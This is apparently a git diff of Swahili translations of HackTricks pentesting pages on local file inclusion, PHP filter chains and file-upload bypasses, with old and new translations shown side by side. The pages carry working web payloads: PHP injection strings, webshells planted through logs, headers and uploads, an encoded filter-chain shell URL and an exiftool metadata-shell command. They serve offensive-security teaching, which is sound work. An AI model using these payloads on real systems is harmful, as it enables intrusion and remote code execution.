Ingawa hili linalenga kuzuia traversal, kwa bahati mbaya linaunda vector kwa ajili ya code injection. Ili kuvitumia kusoma file contents, attacker anaweza kutumia:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
Vivyo hivyo, kwa kutekeleza amri yoyote ya mfumo, mtu anaweza kutumia:
Kwa njia sawa, kwa kutekeleza amri yoyote za mfumo, mtu anaweza kutumia:
```plaintext
' and die(system("id")) or '
```
@ -411,38 +411,38 @@ Ni muhimu **URL-encode these payloads**.
## PHP Blind Path Traversal
> [!WARNING]
> Mbinu hii inatumika katika matukio ambapo unadhibiti **file path** ya **PHP function** ambayo itafanya **access a file** lakini hautaona yaliyomo ya file (kama simu rahisi ya **`file()`**) na yaliyomo hayataonyeshwa.
> Mbinu hii inafaa katika kesi ambapo wewe unadhibiti **file path** ya **PHP function** ambayo ita **access a file** lakini hutaona yaliyomo ya faili (kama simu rahisi ya **`file()`**) kwani yaliyomo hayajaonyeshwa.
Katika [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa kupitia PHP filter ili **exfiltrate the content of a file via an error oracle**.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa via PHP filter ili **exfiltrate the content of a file via an error oracle**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya file kuwa kubwa sana kiasi kwamba **PHP function opening** file itasababisha **error**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya faili kuwa **big** kiasi kwamba **PHP function opening** faili itasababisha **error**.
Halafu, ili leak the first char filter **`dechunk`** inatumika pamoja na zingine kama **base64** au **rot13**, na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika kuweka chars nyingine mwanzoni na leak them.
Kisha, ili leak the first char filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13** na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika ili **place other chars at the beggining and leak them**.
Functions zinazoweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Functions ambazo zinaweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Kwa maelezo ya kitaalamu angalia post iliyotajwa!
Kwa maelezo ya kiufundi angalia post uliotajwa!
## LFI2RCE
### Arbitrary File Write via Path Traversal (Webshell RCE)
Wakati code ya server-side inayochukua/kuupload files inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la file au URL) bila canonicalising na validating, segments `..` na absolute paths zinaweza kutoroka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kawaida unapata unauthenticated RCE kwa ku-drop webshell.
Wakati code ya server-side inayokubali/uploads faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la faili au URL) bila canonicalising na validating, `..` segments na absolute paths zinaweza kutoroka kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kwa kawaida unapata unauthenticated RCE kwa kuacha webshell.
Typical exploitation workflow:
- Tambua write primitive kwenye endpoint au background worker ambayo inakubali path/filename na inaandika content kwenye disk (k.m., message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Mifano ya kawaida:
- Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika yaliyomo kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Common examples:
- Apache/PHP: `/var/www/html/`
- Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
- IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
- Tengeneza traversal path inayoondoka kwenye storage directory iliyokusudiwa kuelekea webroot, na jumuisha webshell content.
- Tengeneza traversal path inayovunja kutoka kwenye intended storage directory hadi webroot, na jumuisha yaliyomo ya webshell yako.
- Tembelea payload ulioweka na utekeleze amri.
Notes:
Vidokezo:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- On Java stacks, these file writes are often implemented with simple `File`/`Paths` concatenation. Lack of canonicalisation/allow-listing is the core flaw.
- Kwenye Java stacks, uandishi huu wa faili mara nyingi hufanywa kwa simple `File`/`Paths` concatenation. Ukosefu wa canonicalisation/allow-listing ndiko kasoro kuu.
Generic XML/JMF-style example (product schemas vary the DOCTYPE/body wrapper is irrelevant for the traversal):
Generic XML/JMF-style example (product schemas zinatofautiana DOCTYPE/body wrapper haina umuhimu kwa traversal):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
@ -466,26 +466,26 @@ in.transferTo(out);
</Command>
</JMF>
```
Uimarishaji unaozuia aina hii ya mende:
- Tafuta njia ya kanoni na uthibitishe kuwa ni tawi la saraka ya msingi iliyoorodheshwa kwa ruhusa.
- Kataa njia yoyote inayojumuisha `..`, mizizi ya absolute, au barua za drive; pendelea majina ya faili yaliyotengenezwa.
- Endesha writer kama akaunti yenye vibali vidogo na tengeneza utofauti kati ya saraka za kuandika na mizizi inayohudumiwa.
Uimarishaji unaofanya kazi dhidi ya aina hii ya hitilafu:
- Weka njia hadi canonical path na udhibiti kwamba ni mrithi wa saraka ya msingi iliyoorodheshwa.
- Kataa njia yoyote inayojumuisha `..`, absolute roots, au drive letters; pendelea generated filenames.
- Endesha mchakato wa kuandika kama akaunti yenye ruhusa ndogo na tofautisha saraka za kuandika kutoka kwa served roots.
## Remote File Inclusion
Explained previously, [**follow this link**](#remote-file-inclusion).
Imeelezewa hapo awali, [**follow this link**](#remote-file-inclusion).
### Via Apache/Nginx log file
### Kupitia faili za logi za Apache/Nginx
Ikiwa server ya Apache au Nginx ni **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na include hilo faili
Iwapo server ya Apache au Nginx iko **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na ku-include faili hilo
> [!WARNING]
> Kumbuka kwamba **ikiwa utatumia nukuu mbili (double quotes)** kwa shell badala ya **nukuu moja (simple quotes)**, nukuu hizo mbili zitatangazwa kwa ajili ya string "_**quote;**_", **PHP itatoa kosa** hapo na **hakitaendesha chochote kingine**.
> Kumbuka kwamba **kama utatumia double quotes** kwa shell badala ya **simple quotes**, double quotes zitabadilishwa kwa string "_**quote;**_", **PHP itatoa kosa** hapo na **hakutakuwa na chochote kingine kitakachotekelezwa**.
>
> Pia, hakikisha una **andika payload vizuri** au PHP itatoa kosa kila mara inapojaribu kupakia log file na hautapata fursa ya pili.
> Pia, hakikisha **unaandika payload kwa usahihi** au PHP itatoa kosa kila mara itakapo jaribu kupakia faili ya log na hautakuwa na fursa ya pili.
Hii pia inaweza kufanywa katika log nyingine lakini **kuwa mwangalifu,** code iliyomo katika logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" kwenye Base64 na inachukuliwa (decoded) ndani ya logs. PHPShell inaweza kuingizwa ndani ya header hii.\
Other possible log paths:
Hii pia inaweza kufanywa katika logi nyingine lakini **kuwa mwangalifu,** code ndani ya logi inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" katika Base64 na inachanganuliwa ndani ya logi. PHPShell inaweza kuingizwa ndani ya header hii.\
Njia nyingine zinazowezekana za logi:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
@ -499,44 +499,44 @@ Other possible log paths:
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Kupitia Barua pepe
### Kupitia Email
**Tuma barua pepe** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua pepe ya mtumiaji kwa path kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
**Tuma barua** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
### Kupitia /proc/*/fd/*
1. Pakia shells nyingi (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), ambapo $PID = PID ya mchakato (can be brute forced) na $FD ni file descriptor (can be brute forced too)
1. Upload a lot of shells (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
### Kupitia /proc/self/environ
Kama faili ya log, tuma payload katika User-Agent, itaonekana ndani ya faili /proc/self/environ
Kama log file, tuma payload katika User-Agent, itaonekana ndani ya /proc/self/environ file
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
### Kupakia
### Kupitia upload
Ikiwa unaweza kupakia faili, ingiza tu shell payload ndani yake (kwa mfano: `<?php system($_GET['c']); ?>`).
Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (e.g : `<?php system($_GET['c']); ?>` ).
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
Ili faili iwe rahisi kusoma ni bora ku-inject ndani ya metadata ya picha/doc/pdf
Ili kufanya faili kusomeka vizuri ni bora kuingiza kwenye metadata ya picha/doc/pdf
### Kupitia upakuaji wa ZIP
### Kupitia Zip fie upload
Pakia faili la ZIP linalojumuisha PHP shell iliyoshinikizwa na ufikie:
Pakia ZIP file inayojumuisha PHP shell iliyobanwa kisha ufikie:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### Kupitia PHP sessions
Angalia kama tovuti inatumia PHP Session (PHPSESSID)
Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
Katika PHP, sessions hizi zinahifadhiwa katika _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili.
Katika PHP vikao hivi vinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
@ -551,24 +551,24 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
```
### Kupitia ssh
Kama ssh iko hai angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
Ikiwa ssh imewekwa, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
### **Kupitia** **vsftpd** _**logs**_
Logs za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika senario ambapo kuna Local File Inclusion (LFI) vulnerability, na ikiwa inawezekana kupata server ya vsftpd iliyofichuliwa, hatua zifuatazo zinaweza kuzingatiwa:
Logi za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika tukio ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa server ya vsftpd iliyofichuliwa unapatikana, hatua zifuatazo zinaweza kuzingatiwa:
1. Ingiza payload ya PHP kwenye uwanja wa username wakati wa mchakato wa kuingia.
2. Baada ya injection, tumia LFI kupata logs za server kutoka _**/var/log/vsftpd.log**_.
1. Inject PHP payload kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logi za server kutoka _**/var/log/vsftpd.log**_.
### Kupitia php base64 filter (kutumia base64)
### Kupitia php base64 filter (using base64)
Kama inavyoonyeshwa katika [hii](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter hupuuza tu Non-base64. Unaweza kutumia hilo kupitisha ukaguzi wa extension ya faili: ikiwa utatoa base64 inayomalizika na ".php", itapuuza tu "." na itaongeza "php" kwenye base64. Hapa kuna mfano wa payload:
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter huvipuuza vitu visivyo-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### Kwa kutumia php filters (hakuna faili inahitajika)
### Via php filters (hakuna faili inahitajika)
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
@ -577,42 +577,42 @@ This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278
lfi2rce-via-php-filters.md
{{#endref}}
### Kwa kutumia segmentation fault
### Via segmentation fault
**Pakia** faili itakayohifadhiwa kama **ya muda** katika `/tmp`, kisha katika **ombi lile lile,** chochea **segmentation fault**, na kisha **temporary file won't be deleted** na unaweza kuitafuta.
Pakia faili itakayohifadhiwa kama ya muda katika /tmp, kisha katika request ileile, chochea segmentation fault, na basi faili ya muda haitafutwa na unaweza kuitafuta.
{{#ref}}
lfi2rce-via-segmentation-fault.md
{{#endref}}
### Kwa kutumia Nginx temp file storage
### Via Nginx temp file storage
If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:
Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kuweza kupata RCE kwa mbinu ifuatayo:
{{#ref}}
lfi2rce-via-nginx-temp-files.md
{{#endref}}
### Kutumia PHP_SESSION_UPLOAD_PROGRESS
### Via PHP_SESSION_UPLOAD_PROGRESS
Ikiwa umepata **Local File Inclusion** hata kama **huna session** na `session.auto_start` ni `Off`. Ukitoa **`PHP_SESSION_UPLOAD_PROGRESS`** katika data ya **multipart POST**, PHP itaanzisha session kwa niaba yako. Unaweza kutumia hili kupata RCE:
Ikiwa umepata Local File Inclusion hata kama huna session na `session.auto_start` iko `Off`. Ikiwa utatoa `PHP_SESSION_UPLOAD_PROGRESS` katika multipart POST data, PHP itawasha session kwa ajili yako. Unaweza kutumia vibaya hii kupata RCE:
{{#ref}}
via-php_session_upload_progress.md
{{#endref}}
### Kupitia upakiaji wa faili za muda kwenye Windows
### Via temp file uploads in Windows
Ikiwa umepata **Local File Inclusion** na server inaendesha kwenye **Windows** unaweza kupata RCE:
Ikiwa umepata Local File Inclusion na server inaendesha kwenye Windows unaweza kupata RCE:
{{#ref}}
lfi2rce-via-temp-file-uploads.md
{{#endref}}
### Kupitia `pearcmd.php` + URL args
### Via `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowrs write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsais “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
@ -629,7 +629,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
```
### Kupitia phpinfo() (file_uploads = on)
Ikiwa umepata **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
Ikiwa umegundua **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
{{#ref}}
@ -638,7 +638,7 @@ lfi2rce-via-phpinfo.md
### Kupitia compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
Ikiwa umepata **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inafanya **checking** kama **file to be included has PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia hii **Race Condition**:
Ikiwa umegundua **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inakagua kama **faili itakayojumuishwa ina PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
{{#ref}}
@ -647,7 +647,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
### Kupitia eternal waiting + bruteforce
Ikiwa unaweza kuabusu LFI ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, unaweza kisha **brute force filenames during hours** kutafuta faili ya muda:
Ikiwa unaweza kutumia LFI kuabuse ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, basi unaweza kisha **brute force filenames kwa masaa** ili kupata faili ya muda:
{{#ref}}
@ -656,10 +656,10 @@ lfi2rce-via-eternal-waiting.md
### Kwa Fatal Error
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha kosa hilo).
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
**Sijui jinsi hili linavyoweza kuwa muhimu lakini linaweza kuwa.**\
_Hata ukisababisha PHP Fatal Error, PHP temporary files zilizopakiwa hufutwa._
**Sijui jinsi hili linavyoweza kuwa na manufaa lakini linaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files uploaded zinafutwa._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>

32
src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
View File

@ -7,29 +7,29 @@
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
Msingi ya script ni **kuzalisha Base64** string mwanzoni mwa file ambayo itakamilishwa kwa **decoding** na kutoa payload inayotakiwa ambayo itatafsiriwa na `include`.
Kwa msingi lengo la script ni kukaa na **generate a Base64** string mwanzoni mwa faili ambayo hatimaye itatengenezwa (decoded) kutoa payload inayotakiwa ambayo ita **interpreted by `include`**.
Misingi ya kufanya hivyo ni:
Misingi ya kufanya hili ni:
- `convert.iconv.UTF8.CSISO2022KR` itaweka kila mara `\x1b$)C` mwanzoni mwa string
- `convert.base64-decode` ni mwenye uvumilivu mkubwa; kwa msingi itapuuzia herufi yoyote ambayo si halali kwa base64. Inatoa matatizo ikiwa itakutana na "=" isiyotarajiwa lakini hayo yanaweza kuondolewa na filter `convert.iconv.UTF8.UTF7`
- `convert.iconv.UTF8.CSISO2022KR` daima itaweka `\x1b$)C` mwanzoni mwa string
- `convert.base64-decode` ni mvumilivu sana; kimsingi itapuuzia herufi yoyote ambayo si valid base64. Inasababisha matatizo ikiwa inapokuta "=" isiyotegemewa lakini hayo yanaweza kuondolewa kwa filter `convert.iconv.UTF8.UTF7`.
Mzunguko wa kuunda maudhui ya hiari ni:
Mzunguko wa kuunda yaliyomo yoyote ni:
1. weka mwanzoni `\x1b$)C` kwenye string yetu kama ilivyoelezwa hapo juu
2. tumia mnyororo wa conversions za iconv ambao unaacha base64 yetu ya awali bila kubadilika na kubadilisha sehemu tuliyoiongeza kuwa string ambapo herufi pekee halali za base64 ni sehemu inayofuata ya php code yetu iliyochanganishwa kwa base64
3. base64-decode na kisha base64-encode string ambayo itaondoa takwimu zisizohitajika kati
4. rudi hatua ya 1 ikiwa base64 tunayotaka kujenga bado haijakamilika
5. base64-decode ili kupata php code yetu
1. prepend `\x1b$)C` to our string as described above
2. apply some chain of iconv conversions that leaves our initial base64 intact and converts the part we just prepended to some string where the only valid base64 char is the next part of our base64-encoded php code
3. base64-decode and base64-encode the string which will remove any garbage in between
4. Go back to 1 if the base64 we want to construct isn't finished yet
5. base64-decode to get our php code
> [!WARNING]
> **Includes** kawaida hufanya mambo kama **appending ".php" at the end** ya file, ambayo inaweza kufanya exploitation kuwa ngumu kwa sababu utahitaji kupata faili .php yenye content ambayo haitakufa (doesn't kill) exploit... au unaweza **tu tumia `php://temp` kama resource** kwa sababu inaweza **have anything appended in the name** (lie +".php") na bado itawezesha exploit kufanya kazi!
> **Includes** kawaida hufanya mambo kama **kuongeza ".php" mwishoni** mwa faili, jambo ambalo linaweza kufanya exploitation hii kuwa ngumu kwa sababu utahitaji kupata faili .php lenye yaliyomo ambayo haviua exploit... au unaweza **kutumia `php://temp` kama resource** kwa sababu inaweza **kupokea chochote kilichoongezwa kwenye jina** (kama +".php") na bado itawezesha exploit ifanye kazi!
## Jinsi ya kuongeza pia suffixes kwa data inayopatikana
## How to add also suffixes to the resulting data
[**This writeup explains**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) jinsi unaweza bado kuabusu PHP filters kuongeza suffixes kwenye string inayopatikana. Hii ni nzuri ikiwa unahitaji output kuwa na format maalum (kama json au labda kuongeza baadhi ya PNG magic bytes)
[**This writeup explains**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) how you can still abuse PHP filters to add suffixes to the resulting string. Hii ni nzuri ukiwa unahitaji output kuwa na muundo maalum (kama json au labda kuongeza baadhi ya PNG magic bytes)
## Vyombo vya Kiotomatiki
## Automatic Tools
- [https://github.com/synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator)
- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **(can add suffixes)**
@ -96,7 +96,7 @@ print(r.text)
```
### Maboresho
Script iliyopita ina mipaka kwa herufi za base64 zinazohitajika kwa payload hiyo. Kwa hivyo, niliunda script yangu mwenyewe ili **bruteforce all the base64 characters**:
Script iliyotangulia imezuilishwa kwa herufi za base64 zinazohitajika kwa payload hiyo. Kwa hivyo, niliunda script yangu ili **bruteforce all the base64 characters**:
```php
conversions = {
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
@ -251,7 +251,7 @@ find_vals($init);
}
?>
```
## Marejeleo Zaidi
## Marejeo Zaidi
- [https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)

164
src/pentesting-web/file-upload/README.md
View File

@ -1,13 +1,13 @@
# Kupakia Faili
# File Upload
{{#include ../../banners/hacktricks-training.md}}
## Mbinu Za Jumla za Kupakia Faili
## File Upload General Methodology
Nyongeza za ziada muhimu:
Other useful extensions:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
@ -15,13 +15,13 @@ Nyongeza za ziada muhimu:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Kupitisha ukaguzi wa extensions za faili
### Bypass file extensions checks
1. Kama zinatumika, **angalia** **extensions zilizotajwa hapo juu.** Pia zijaribu kwa kutumia baadhi ya **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa hapo juu pia):_
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **vishazi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** zote. (_Kumbuka pia unaweza kujaribu kutumia **extensions** zilizotajwa hapo juu_)
3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Nyongeza za ziada muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kuipita kinga kwa **kuudanganya parser ya extension** upande wa server kwa mbinu kama **kudouble** extension au **kuongeza data za taka** (bytes za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo juu kupanga payload bora._
4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Nyongeza za ziada muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliotangulia:
5. Add **another layer of extensions** to the previous check:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **exec extension kabla ya extension halali** na matumaini server imekonfiguriwa vibaya. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kuwa muhimu kupita vizuizi zaidi (.e.g. "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP ya hatari inabaki. AAA<--SNIP-->AAA.php
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character ":” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. "file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The "**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.”)
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
@ -63,52 +63,52 @@ AAA<--SNIP 232 A-->AAA.php.png
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Pitia ukaguzi wa **magic number** kwa kuongeza mwanzoni mwa faili bytes za picha halisi (kuwachanganya amri ya _file_). Au weka shell ndani ya **metadata**:\
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya picha:\
